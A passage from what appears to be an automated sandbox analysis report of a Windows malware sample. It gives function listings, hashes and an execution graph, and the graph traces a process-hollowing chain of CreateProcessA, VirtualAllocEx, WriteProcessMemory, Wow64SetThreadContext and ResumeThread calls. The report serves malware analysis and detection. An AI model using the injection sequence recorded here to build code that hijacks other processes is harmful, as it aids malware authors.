                                                              • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                              • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                              Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                              • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                              • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                              • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                              • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                              Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 1000655C
                                                                • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                              • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                              • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                              • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                              Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: : $Se.
                                                              • API String ID: 4218353326-4089948878
                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                              Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                              • String ID: Unknown exception
                                                              • API String ID: 3476068407-410509341
                                                              • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                              • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                              • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                              • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                              Execution Graph

                                                              Execution Coverage:11.7%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:313
                                                              Total number of Limit Nodes:13
                                                              execution_graph 45558 5317a50 45559 5317bdb 45558->45559 45561 5317a76 45558->45561 45561->45559 45562 53150dc 45561->45562 45563 5317cd0 PostMessageW 45562->45563 45564 5317d3c 45563->45564 45564->45561 45565 31b4668 45566 31b4672 45565->45566 45568 31b4759 45565->45568 45569 31b477d 45568->45569 45573 31b4858 45569->45573 45577 31b4868 45569->45577 45575 31b4868 45573->45575 45574 31b496c 45574->45574 45575->45574 45581 31b44c4 45575->45581 45578 31b488f 45577->45578 45579 31b496c 45578->45579 45580 31b44c4 CreateActCtxA 45578->45580 45580->45579 45582 31b58f8 CreateActCtxA 45581->45582 45584 31b59bb 45582->45584 45584->45584 45423 31baf10 45426 31bb008 45423->45426 45424 31baf1f 45427 31bb019 45426->45427 45428 31bb03c 45426->45428 45427->45428 45432 31bb034 45427->45432 45433 31bb291 45427->45433 45428->45424 45429 31bb240 GetModuleHandleW 45430 31bb26d 45429->45430 45430->45424 45432->45428 45432->45429 45434 31bb29a 45433->45434 45435 31bb239 GetModuleHandleW 45433->45435 45434->45432 45437 31bb26d 45435->45437 45437->45432 45585 31bd2a0 45586 31bd2e6 45585->45586 45590 31bd470 45586->45590 45593 31bd480 45586->45593 45587 31bd3d3 45596 31baef4 45590->45596 45594 31bd4ae 45593->45594 45595 31baef4 DuplicateHandle 45593->45595 45594->45587 45595->45594 45597 31bd4e8 DuplicateHandle 45596->45597 45598 31bd4ae 45597->45598 45598->45587 45438 77d4a70 45439 77d4a7c 45438->45439 45443 77d79b0 45439->45443 45448 77d79a0 45439->45448 45440 77d4a8d 45444 77d79cc 45443->45444 45453 77d88e8 45444->45453 45459 77d88d7 45444->45459 45445 77d7a76 45445->45440 45449 77d79b0 45448->45449 45451 77d88e8 NtQueryInformationProcess 45449->45451 45452 77d88d7 NtQueryInformationProcess 45449->45452 45450 77d7a76 45450->45440 45451->45450 45452->45450 45454 77d88fa 45453->45454 45465 77d896f 45454->45465 45471 77d8918 45454->45471 45476 77d8928 45454->45476 45455 77d890e 45455->45445 45460 77d88e8 45459->45460 45462 77d896f NtQueryInformationProcess 45460->45462 45463 77d8928 NtQueryInformationProcess 45460->45463 45464 77d8918 NtQueryInformationProcess 45460->45464 45461 77d890e 45461->45445 45462->45461 45463->45461 45464->45461 45466 77d897a 45465->45466 45467 77d8926 45465->45467 45466->45455 45468 77d8965 45467->45468 45481 77d8df8 45467->45481 45485 77d8de8 45467->45485 45468->45455 45472 77d8928 45471->45472 45473 77d8965 45472->45473 45474 77d8df8 NtQueryInformationProcess 45472->45474 45475 77d8de8 NtQueryInformationProcess 45472->45475 45473->45455 45474->45473 45475->45473 45477 77d8942 45476->45477 45478 77d8965 45477->45478 45479 77d8df8 NtQueryInformationProcess 45477->45479 45480 77d8de8 NtQueryInformationProcess 45477->45480 45478->45455 45479->45478 45480->45478 45482 77d8e1c 45481->45482 45489 77d8a18 45482->45489 45486 77d8df8 45485->45486 45487 77d8a18 NtQueryInformationProcess 45486->45487 45488 77d8ea3 45487->45488 45488->45468 45490 77d8f58 NtQueryInformationProcess 45489->45490 45492 77d8ea3 45490->45492 45492->45468 45546 77d9760 45548 77d9784 45546->45548 45550 77d8a68 45548->45550 45554 77d8a74 45548->45554 45551 77d9c40 OutputDebugStringW 45550->45551 45553 77d9cbf 45551->45553 45553->45548 45555 77d9cf0 CloseHandle 45554->45555 45557 77d9d5e 45555->45557 45557->45548 45493 312d01c 45494 312d034 45493->45494 45495 312d08e 45494->45495 45498 5902c09 45494->45498 45507 590115c 45494->45507 45499 5902c18 45498->45499 45500 5902c79 45499->45500 45503 5902c69 45499->45503 45532 5901284 45500->45532 45502 5902c77 45516 5902d90 45503->45516 45521 5902da0 45503->45521 45526 5902e6c 45503->45526 45508 5901167 45507->45508 45509 5902c79 45508->45509 45511 5902c69 45508->45511 45510 5901284 CallWindowProcW 45509->45510 45512 5902c77 45510->45512 45513 5902d90 CallWindowProcW 45511->45513 45514 5902da0 CallWindowProcW 45511->45514 45515 5902e6c CallWindowProcW 45511->45515 45513->45512 45514->45512 45515->45512 45518 5902da0 45516->45518 45517 5902e40 45517->45502 45536 5902e48 45518->45536 45540 5902e58 45518->45540 45523 5902db4 45521->45523 45522 5902e40 45522->45502 45524 5902e58 CallWindowProcW 45523->45524 45525 5902e48 CallWindowProcW 45523->45525 45524->45522 45525->45522 45527 5902e2a 45526->45527 45528 5902e7a 45526->45528 45530 5902e58 CallWindowProcW 45527->45530 45531 5902e48 CallWindowProcW 45527->45531 45529 5902e40 45529->45502 45530->45529 45531->45529 45533 590128f 45532->45533 45534 590435a CallWindowProcW 45533->45534 45535 5904309 45533->45535 45534->45535 45535->45502 45537 5902e58 45536->45537 45539 5902e69 45537->45539 45543 5904293 45537->45543 45539->45517 45541 5902e69 45540->45541 45542 5904293 CallWindowProcW 45540->45542 45541->45517 45542->45541 45544 5901284 CallWindowProcW 45543->45544 45545 59042aa 45544->45545 45545->45539 45599 53147ce 45600 53146e9 45599->45600 45601 53149c1 45600->45601 45605 5316779 45600->45605 45624 53167ee 45600->45624 45644 5316788 45600->45644 45606 5316788 45605->45606 45607 53167aa 45606->45607 45663 5316cd2 45606->45663 45668 531708e 45606->45668 45673 5316d4e 45606->45673 45679 5316e6f 45606->45679 45690 5316d2c 45606->45690 45696 5316f6d 45606->45696 45701 5316f2a 45606->45701 45709 5317068 45606->45709 45718 5316dc8 45606->45718 45723 5316bc9 45606->45723 45728 5317129 45606->45728 45733 5316ba7 45606->45733 45738 53172a3 45606->45738 45744 531701d 45606->45744 45753 5316db4 45606->45753 45762 5317275 45606->45762 45607->45601 45625 53167f1 45624->45625 45626 531677c 45624->45626 45625->45601 45627 53167aa 45626->45627 45628 5316cd2 2 API calls 45626->45628 45629 5317275 4 API calls 45626->45629 45630 5316db4 4 API calls 45626->45630 45631 531701d 4 API calls 45626->45631 45632 53172a3 4 API calls 45626->45632 45633 5316ba7 2 API calls 45626->45633 45634 5317129 2 API calls 45626->45634 45635 5316bc9 2 API calls 45626->45635 45636 5316dc8 2 API calls 45626->45636 45637 5317068 4 API calls 45626->45637 45638 5316f2a 4 API calls 45626->45638 45639 5316f6d 2 API calls 45626->45639 45640 5316d2c 2 API calls 45626->45640 45641 5316e6f 6 API calls 45626->45641 45642 5316d4e 2 API calls 45626->45642 45643 531708e 2 API calls 45626->45643 45627->45601 45628->45627 45629->45627 45630->45627 45631->45627 45632->45627 45633->45627 45634->45627 45635->45627 45636->45627 45637->45627 45638->45627 45639->45627 45640->45627 45641->45627 45642->45627 45643->45627 45645 53167a2 45644->45645 45646 53167aa 45645->45646 45647 5316cd2 2 API calls 45645->45647 45648 5317275 4 API calls 45645->45648 45649 5316db4 4 API calls 45645->45649 45650 531701d 4 API calls 45645->45650 45651 53172a3 4 API calls 45645->45651 45652 5316ba7 2 API calls 45645->45652 45653 5317129 2 API calls 45645->45653 45654 5316bc9 2 API calls 45645->45654 45655 5316dc8 2 API calls 45645->45655 45656 5317068 4 API calls 45645->45656 45657 5316f2a 4 API calls 45645->45657 45658 5316f6d 2 API calls 45645->45658 45659 5316d2c 2 API calls 45645->45659 45660 5316e6f 6 API calls 45645->45660 45661 5316d4e 2 API calls 45645->45661 45662 531708e 2 API calls 45645->45662 45646->45601 45647->45646 45648->45646 45649->45646 45650->45646 45651->45646 45652->45646 45653->45646 45654->45646 45655->45646 45656->45646 45657->45646 45658->45646 45659->45646 45660->45646 45661->45646 45662->45646 45664 5316cdf 45663->45664 45771 53142a0 45664->45771 45775 5314295 45664->45775 45669 5317094 45668->45669 45779 5313992 45669->45779 45783 5313998 45669->45783 45670 53170ba 45670->45607 45674 5316d35 45673->45674 45675 5317527 45674->45675 45677 5313992 ResumeThread 45674->45677 45678 5313998 ResumeThread 45674->45678 45675->45607 45676 53170ba 45676->45607 45677->45676 45678->45676 45787 5313f50 45679->45787 45791 5313f58 45679->45791 45680 5316e8d 45683 5314018 WriteProcessMemory 45680->45683 45795 5314011 45680->45795 45681 5316eef 45684 5314011 WriteProcessMemory 45681->45684 45799 5314018 45681->45799 45803 5313e80 45681->45803 45807 5313e78 45681->45807 45683->45681 45684->45681 45691 5316d35 45690->45691 45692 5317527 45691->45692 45694 5313992 ResumeThread 45691->45694 45695 5313998 ResumeThread 45691->45695 45692->45607 45693 53170ba 45693->45607 45694->45693 45695->45693 45697 5316f79 45696->45697 45699 5314011 WriteProcessMemory 45697->45699 45700 5314018 WriteProcessMemory 45697->45700 45698 5317219 45699->45698 45700->45698 45702 5316f37 45701->45702 45703 5316d35 45702->45703 45704 53170ba 45702->45704 45705 5313e80 Wow64SetThreadContext 45702->45705 45706 5313e78 Wow64SetThreadContext 45702->45706 45703->45704 45707 5313992 ResumeThread 45703->45707 45708 5313998 ResumeThread 45703->45708 45704->45607 45705->45702 45706->45702 45707->45704 45708->45704 45710 5317075 45709->45710 45811 5314100 45710->45811 45815 5314108 45710->45815 45711 5317527 45711->45607 45712 5316d35 45712->45711 45716 5313992 ResumeThread 45712->45716 45717 5313998 ResumeThread 45712->45717 45713 53170ba 45713->45607 45716->45713 45717->45713 45719 5316dd8 45718->45719 45721 5314011 WriteProcessMemory 45719->45721 45722 5314018 WriteProcessMemory 45719->45722 45720 5316f62 45720->45607 45721->45720 45722->45720 45724 5316bb3 45723->45724 45724->45607 45725 5316d0d 45724->45725 45726 53142a0 CreateProcessA 45724->45726 45727 5314295 CreateProcessA 45724->45727 45725->45607 45726->45725 45727->45725 45729 53170a6 45728->45729 45730 53170ba 45729->45730 45731 5313992 ResumeThread 45729->45731 45732 5313998 ResumeThread 45729->45732 45730->45607 45731->45730 45732->45730 45734 5316bb3 45733->45734 45735 5316d0d 45734->45735 45736 53142a0 CreateProcessA 45734->45736 45737 5314295 CreateProcessA 45734->45737 45735->45607 45736->45735 45737->45735 45739 5316eef 45738->45739 45739->45738 45740 5313e80 Wow64SetThreadContext 45739->45740 45741 5313e78 Wow64SetThreadContext 45739->45741 45742 5314011 WriteProcessMemory 45739->45742 45743 5314018 WriteProcessMemory 45739->45743 45740->45739 45741->45739 45742->45739 45743->45739 45745 5317023 45744->45745 45751 5314011 WriteProcessMemory 45745->45751 45752 5314018 WriteProcessMemory 45745->45752 45746 5316eef 45747 5314011 WriteProcessMemory 45746->45747 45748 5314018 WriteProcessMemory 45746->45748 45749 5313e80 Wow64SetThreadContext 45746->45749 45750 5313e78 Wow64SetThreadContext 45746->45750 45747->45746 45748->45746 45749->45746 45750->45746 45751->45746 45752->45746 45754 5316dc1 45753->45754 45758 5314100 ReadProcessMemory 45754->45758 45759 5314108 ReadProcessMemory 45754->45759 45755 5316d35 45756 5317527 45755->45756 45760 5313992 ResumeThread 45755->45760 45761 5313998 ResumeThread 45755->45761 45756->45607 45757 53170ba 45757->45607 45758->45755 45759->45755 45760->45757 45761->45757 45763 5317290 45762->45763 45767 5314100 ReadProcessMemory 45763->45767 45768 5314108 ReadProcessMemory 45763->45768 45764 5317527 45764->45607 45765 5316d35 45765->45764 45769 5313992 ResumeThread 45765->45769 45770 5313998 ResumeThread 45765->45770 45766 53170ba 45766->45607 45767->45765 45768->45765 45769->45766 45770->45766 45772 5314329 CreateProcessA 45771->45772 45774 53144eb 45772->45774 45776 5314329 CreateProcessA 45775->45776 45778 53144eb 45776->45778 45780 5313998 ResumeThread 45779->45780 45782 5313a09 45780->45782 45782->45670 45784 53139d8 ResumeThread 45783->45784 45786 5313a09 45784->45786 45786->45670 45788 5313f58 VirtualAllocEx 45787->45788 45790 5313fd5 45788->45790 45790->45680 45792 5313f98 VirtualAllocEx 45791->45792 45794 5313fd5 45792->45794 45794->45680 45796 5314018 WriteProcessMemory 45795->45796 45798 53140b7 45796->45798 45798->45681 45800 5314060 WriteProcessMemory 45799->45800 45802 53140b7 45800->45802 45802->45681 45804 5313ec5 Wow64SetThreadContext 45803->45804 45806 5313f0d 45804->45806 45806->45681 45808 5313ec5 Wow64SetThreadContext 45807->45808 45810 5313f0d 45808->45810 45810->45681 45812 5314108 ReadProcessMemory 45811->45812 45814 5314197 45812->45814 45814->45712 45816 5314153 ReadProcessMemory 45815->45816 45818 5314197 45816->45818 45818->45712

                                                              Executed Functions

                                                              Function 077D8F50 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 077D8FD7
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID:
                                                              • API String ID: 1778838933-0
                                                              • Opcode ID: 9fb3d353ab03e0f6be2f076cab684e38d3450505fbb71a6180d520d32d597b2c
                                                              • Instruction ID: 59eb488a13696f8730c6fa79bd65755784bbce349cf54ef46e9b1fcac53f1082
                                                              • Opcode Fuzzy Hash: 9fb3d353ab03e0f6be2f076cab684e38d3450505fbb71a6180d520d32d597b2c
                                                              • Instruction Fuzzy Hash: F521EFB5900259EFCB10DF9AD884ADEFBF5FB58310F10842AE918A7310C375A944CFA5
                                                              Function 077D8A18 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 077D8FD7
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2138658196.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID:
                                                              • API String ID: 1778838933-0
                                                              • Opcode ID: e55692b8167d91e186d0590aa6b311e775f3083a806e13611f488d834a393c3d
                                                              • Instruction ID: 4a8102c00ce53a2588696eed47c63bd26661994613a27429963635e750af2db7
                                                              • Opcode Fuzzy Hash: e55692b8167d91e186d0590aa6b311e775f3083a806e13611f488d834a393c3d
                                                              • Instruction Fuzzy Hash: 7D21EDB5900359EFCB10DF9AD884ADEFBF5FB58310F10842AEA18A7210C375A944CFA5
                                                              Function 05314295 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 945 5314295-5314335 947 5314337-5314341 945->947 948 531436e-531438e 945->948 947->948 949 5314343-5314345 947->949 955 5314390-531439a 948->955 956 53143c7-53143f6 948->956 950 5314347-5314351 949->950 951 5314368-531436b 949->951 953 5314353 950->953 954 5314355-5314364 950->954 951->948 953->954 954->954 957 5314366 954->957 955->956 958 531439c-531439e 955->958 962 53143f8-5314402 956->962 963 531442f-53144e9 CreateProcessA 956->963 957->951 960 53143c1-53143c4 958->960 961 53143a0-53143aa 958->961 960->956 964 53143ac 961->964 965 53143ae-53143bd 961->965 962->963 966 5314404-5314406 962->966 976 53144f2-5314578 963->976 977 53144eb-53144f1 963->977 964->965 965->965 967 53143bf 965->967 968 5314429-531442c 966->968 969 5314408-5314412 966->969 967->960 968->963 971 5314414 969->971 972 5314416-5314425 969->972 971->972 972->972 973 5314427 972->973 973->968 987 5314588-531458c 976->987 988 531457a-531457e 976->988 977->976 990 531459c-53145a0 987->990 991 531458e-5314592 987->991 988->987 989 5314580 988->989 989->987 993 53145b0-53145b4 990->993 994 53145a2-53145a6 990->994 991->990 992 5314594 991->992 992->990 996 53145c6-53145cd 993->996 997 53145b6-53145bc 993->997 994->993 995 53145a8 994->995 995->993 998 53145e4 996->998 999 53145cf-53145de 996->999 997->996 1001 53145e5 998->1001 999->998 1001->1001
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 053144D6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: a324ed52a10846376d0055a8b386fb31c0609f9213cdb6e77527be7ea1851405
                                                              • Instruction ID: d1778d2c56ed62b6f77e7ca7dbc0e94c8ea02c97a2a0316b6aa9f1258a320344
                                                              • Opcode Fuzzy Hash: a324ed52a10846376d0055a8b386fb31c0609f9213cdb6e77527be7ea1851405
                                                              • Instruction Fuzzy Hash: 93A15B71D00219DFDF14CFA8C841BEDBBB2BF48310F1485A9E809A7290DBB49995CF95
                                                              Function 053142A0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1002 53142a0-5314335 1004 5314337-5314341 1002->1004 1005 531436e-531438e 1002->1005 1004->1005 1006 5314343-5314345 1004->1006 1012 5314390-531439a 1005->1012 1013 53143c7-53143f6 1005->1013 1007 5314347-5314351 1006->1007 1008 5314368-531436b 1006->1008 1010 5314353 1007->1010 1011 5314355-5314364 1007->1011 1008->1005 1010->1011 1011->1011 1014 5314366 1011->1014 1012->1013 1015 531439c-531439e 1012->1015 1019 53143f8-5314402 1013->1019 1020 531442f-53144e9 CreateProcessA 1013->1020 1014->1008 1017 53143c1-53143c4 1015->1017 1018 53143a0-53143aa 1015->1018 1017->1013 1021 53143ac 1018->1021 1022 53143ae-53143bd 1018->1022 1019->1020 1023 5314404-5314406 1019->1023 1033 53144f2-5314578 1020->1033 1034 53144eb-53144f1 1020->1034 1021->1022 1022->1022 1024 53143bf 1022->1024 1025 5314429-531442c 1023->1025 1026 5314408-5314412 1023->1026 1024->1017 1025->1020 1028 5314414 1026->1028 1029 5314416-5314425 1026->1029 1028->1029 1029->1029 1030 5314427 1029->1030 1030->1025 1044 5314588-531458c 1033->1044 1045 531457a-531457e 1033->1045 1034->1033 1047 531459c-53145a0 1044->1047 1048 531458e-5314592 1044->1048 1045->1044 1046 5314580 1045->1046 1046->1044 1050 53145b0-53145b4 1047->1050 1051 53145a2-53145a6 1047->1051 1048->1047 1049 5314594 1048->1049 1049->1047 1053 53145c6-53145cd 1050->1053 1054 53145b6-53145bc 1050->1054 1051->1050 1052 53145a8 1051->1052 1052->1050 1055 53145e4 1053->1055 1056 53145cf-53145de 1053->1056 1054->1053 1058 53145e5 1055->1058 1056->1055 1058->1058
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 053144D6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2126506138.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5310000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 30fff3d94b309b91917eb2cf136d9db26b7094a850f3139abea39ae782b9e294
                                                              • Instruction ID: 0c818876cb7a17eefe1c60ff4ac47191c7a3b7b19dc8c6dd0efbe0b6dbb200f4
                                                              • Opcode Fuzzy Hash: 30fff3d94b309b91917eb2cf136d9db26b7094a850f3139abea39ae782b9e294
                                                              • Instruction Fuzzy Hash: 6A915A71D002199FDF24DFA9C841BEDBBB2BF48310F1485A9E809A7280DBB49995CF95
                                                              Function 031BB008 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1059 31bb008-31bb017 1060 31bb019-31bb026 call 31bacc0 1059->1060 1061 31bb043-31bb047 1059->1061 1068 31bb028 1060->1068 1069 31bb03c 1060->1069 1063 31bb05b-31bb09c 1061->1063 1064 31bb049-31bb053 1061->1064 1070 31bb0a9-31bb0b7 1063->1070 1071 31bb09e-31bb0a6 1063->1071 1064->1063 1115 31bb02e call 31bb291 1068->1115 1116 31bb02e call 31bb2a0 1068->1116 1069->1061 1072 31bb0db-31bb0dd 1070->1072 1073 31bb0b9-31bb0be 1070->1073 1071->1070 1078 31bb0e0-31bb0e7 1072->1078 1075 31bb0c9 1073->1075 1076 31bb0c0-31bb0c7 call 31baccc 1073->1076 1074 31bb034-31bb036 1074->1069 1077 31bb178-31bb238 1074->1077 1082 31bb0cb-31bb0d9 1075->1082 1076->1082 1110 31bb23a-31bb23d 1077->1110 1111 31bb240-31bb26b GetModuleHandleW 1077->1111 1079 31bb0e9-31bb0f1 1078->1079 1080 31bb0f4-31bb0fb 1078->1080 1079->1080 1083 31bb108-31bb10a call 31bacdc 1080->1083 1084 31bb0fd-31bb105 1080->1084 1082->1078 1088 31bb10f-31bb111 1083->1088 1084->1083 1090 31bb11e-31bb123 1088->1090 1091 31bb113-31bb11b 1088->1091 1092 31bb141-31bb14e 1090->1092 1093 31bb125-31bb12c 1090->1093 1091->1090 1099 31bb171-31bb177 1092->1099 1100 31bb150-31bb16e 1092->1100 1093->1092 1095 31bb12e-31bb13e call 31bacec call 31bacfc 1093->1095 1095->1092 1100->1099 1110->1111 1112 31bb26d-31bb273 1111->1112 1113 31bb274-31bb288 1111->1113 1112->1113 1115->1074 1116->1074
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 031BB25E
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2119731919.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_31b0000_mXJeXQoaGktJCW.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: a305647c433140a7306b86d71975badc2b8fcfa58b65abd072908ddc9e32f117
                                                              • Instruction ID: d106792aa6bd5d6ec10f1c3ea82e9af399c0919e2e99e1f97ee373e4b7389136
                                                              • Opcode Fuzzy Hash: a305647c433140a7306b86d71975badc2b8fcfa58b65abd072908ddc9e32f117
                                                              • Instruction Fuzzy Hash: 0D7145B0A04B058FDB24DF2AD4417AABBF5FF88300F04896DD49ADBA50DB75E945CB90
                                                              Function 05901284 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
